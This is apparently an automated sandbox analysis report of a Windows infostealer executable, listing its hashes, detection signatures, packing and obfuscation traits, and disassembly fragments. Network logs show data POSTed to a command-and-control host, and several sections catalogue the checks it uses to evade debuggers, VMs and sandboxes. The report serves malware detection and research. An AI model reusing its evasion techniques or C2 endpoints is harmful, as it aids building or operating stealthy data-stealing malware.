Windows Analysis Report
xdeRtWCeNH.exe

Overview

General Information

Sample name: xdeRtWCeNH.exe (renamed because the original name is a hash value)
Original sample name: abcff1e6ac84a5ec546b6672ce45bf02.exe
Analysis ID: 1581579
MD5: abcff1e6ac84a5ec546b6672ce45bf02
SHA1: e5e8c81f0b1d2ea23adbe79d5a69318a7212bbea
SHA256: 3649c7b868952aa06caef1e133c8f4bdcc2a92763380c7e69af4e2f891afd466
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • xdeRtWCeNH.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\xdeRtWCeNH.exe" MD5: ABCFF1E6AC84A5EC546B6672CE45BF02)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: xdeRtWCeNH.exe | Avira: detected
Source: xdeRtWCeNH.exe | Virustotal: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: xdeRtWCeNH.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: -----BEGIN PUBLIC KEY----- 0_2_006EDCF0
Source: xdeRtWCeNH.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_0072A5B0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0072B560
Source: xdeRtWCeNH.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_006C255D
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_006C29FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 501307
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 143 Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 3.218.7.103 3.218.7.103
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0078A8C0 recvfrom, 0_2_0078A8C0
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 501307
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: xdeRtWCeNH.exe, 00000000.00000002.1591295634.0000000001A39000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1569299436.0000000001A37000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1569250697.0000000001A32000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: xdeRtWCeNH.exe, 00000000.00000003.1569250697.0000000001A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: xdeRtWCeNH.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: xdeRtWCeNH.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: xdeRtWCeNH.exe, xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: xdeRtWCeNH.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: xdeRtWCeNH.exe, 00000000.00000003.1480088083.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703

System Summary

Source: xdeRtWCeNH.exe | Static PE information: section name:
Source: xdeRtWCeNH.exe | Static PE information: section name: .idata
Source: xdeRtWCeNH.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_3_01AB46DC 0_3_01AB46DC
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_3_01ABB418 0_3_01ABB418
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006D05B0 0_2_006D05B0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006D6FA0 0_2_006D6FA0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006FF100 0_2_006FF100
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0078B180 0_2_0078B180
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_007900E0 0_2_007900E0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A4A000 0_2_00A4A000
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A4E050 0_2_00A4E050
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00726210 0_2_00726210
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0078C320 0_2_0078C320
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00790420 0_2_00790420
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A14410 0_2_00A14410
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006CE620 0_2_006CE620
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0078C770 0_2_0078C770
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A44780 0_2_00A44780
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0072A7F0 0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A26730 0_2_00A26730
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006CA960 0_2_006CA960
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006D4940 0_2_006D4940
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0077C900 0_2_0077C900
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00896AC0 0_2_00896AC0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0097AAC0 0_2_0097AAC0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A38BF0 0_2_00A38BF0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0097AB2C 0_2_0097AB2C
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006CCBB0 0_2_006CCBB0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00854B60 0_2_00854B60
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A4CC90 0_2_00A4CC90
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00880D80 0_2_00880D80
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A3CD80 0_2_00A3CD80
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A44D40 0_2_00A44D40
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_009DAE30 0_2_009DAE30
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006E4F70 0_2_006E4F70
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A12F90 0_2_00A12F90
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0078EF90 0_2_0078EF90
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00788F90 0_2_00788F90
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006D10E6 0_2_006D10E6
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A2D430 0_2_00A2D430
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A335B0 0_2_00A335B0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A156D0 0_2_00A156D0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A517A0 0_2_00A517A0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00779880 0_2_00779880
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A19920 0_2_00A19920
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A43A70 0_2_00A43A70
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A31BD0 0_2_00A31BD0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00701BE0 0_2_00701BE0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00979C80 0_2_00979C80
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A27CC0 0_2_00A27CC0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006D5DB0 0_2_006D5DB0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006D3ED0 0_2_006D3ED0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_006E5EB0 0_2_006E5EB0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 00705340 appears 50 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 006DCD40 appears 75 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 00704F40 appears 344 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 00704FD0 appears 291 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 0089CBC0 appears 104 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 006C71E0 appears 47 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 006CCAA0 appears 64 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 006C73F0 appears 114 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 006CC960 appears 37 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 007A44A0 appears 76 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 007050A0 appears 101 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 00877220 appears 103 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 006C75A0 appears 707 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: String function: 006DCCD0 appears 55 times
Source: xdeRtWCeNH.exe | Static PE information: Section: kzctzxho ZLIB complexity 0.9944327230730515
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: xdeRtWCeNH.exe | Virustotal: Detection: 47%
Source: xdeRtWCeNH.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: xdeRtWCeNH.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Section loaded: kernel.appcore.dll
Source: xdeRtWCeNH.exe | Static file information: File size 4452352 > 1048576
Source: xdeRtWCeNH.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: xdeRtWCeNH.exe | Static PE information: Raw size of kzctzxho is bigger than: 0x100000 < 0x1b2a00

Data Obfuscation

Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Unpacked PE file: 0.2.xdeRtWCeNH.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kzctzxho:EW;czecwivl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kzctzxho:EW;czecwivl:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: xdeRtWCeNH.exe | Static PE information: real checksum: 0x44da9f should be: 0x446cd1
Source: xdeRtWCeNH.exe | Static PE information: section name:
Source: xdeRtWCeNH.exe | Static PE information: section name: .idata
Source: xdeRtWCeNH.exe | Static PE information: section name:
Source: xdeRtWCeNH.exe | Static PE information: section name: kzctzxho
Source: xdeRtWCeNH.exe | Static PE information: section name: czecwivl
Source: xdeRtWCeNH.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_3_01AACF92 pushfd ; iretd 0_3_01AACF99
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_3_01AADED4 pushad ; iretd 0_3_01AADF52
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A441D0 push eax; mov dword ptr [esp], edx 0_2_00A441D5
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00742340 push eax; mov dword ptr [esp], 00000000h 0_2_00742343
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0077C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_0077C743
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00700AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00700AC4
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00721430 push eax; mov dword ptr [esp], 00000000h 0_2_00721433
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_007439A0 push eax; mov dword ptr [esp], 00000000h 0_2_007439A3
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_0071DAD0 push eax; mov dword ptr [esp], edx 0_2_0071DAD1
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Code function: 0_2_00A49F40 push dword ptr [eax+04h]; ret 0_2_00A49F6F
Source: xdeRtWCeNH.exe | Static PE information: section name: kzctzxho entropy: 7.955934839357001

Boot Survival

Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F11146 second address: F11153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FAD4CB4B576h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F19BE3 second address: F19BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CC61 second address: F1CCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, eax 0x0000000b push 00000000h 0x0000000d jmp 00007FAD4CB4B588h 0x00000012 movsx edx, di 0x00000015 call 00007FAD4CB4B579h 0x0000001a jmp 00007FAD4CB4B587h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007FAD4CB4B576h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CCB4 second address: F1CCBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CCBA second address: F1CCC4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD4CB4B57Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CCC4 second address: F1CCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FAD4CB7BFFDh 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD4CB7C000h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CCEF second address: F1CCF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CCF5 second address: F1CCF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CE02 second address: F1CE08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CE08 second address: F1CE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CE0C second address: F1CE95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FAD4CB4B578h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D1887h] 0x0000002c push 00000000h 0x0000002e and di, B631h 0x00000033 call 00007FAD4CB4B579h 0x00000038 jmp 00007FAD4CB4B582h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FAD4CB4B588h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CE95 second address: F1CE99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CE99 second address: F1CE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CE9F second address: F1CEA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CEA6 second address: F1CEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD4CB4B583h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe | RDTSC instruction interceptor: First address: F1CEC6 second address: F1CEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAD4CB7C007h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
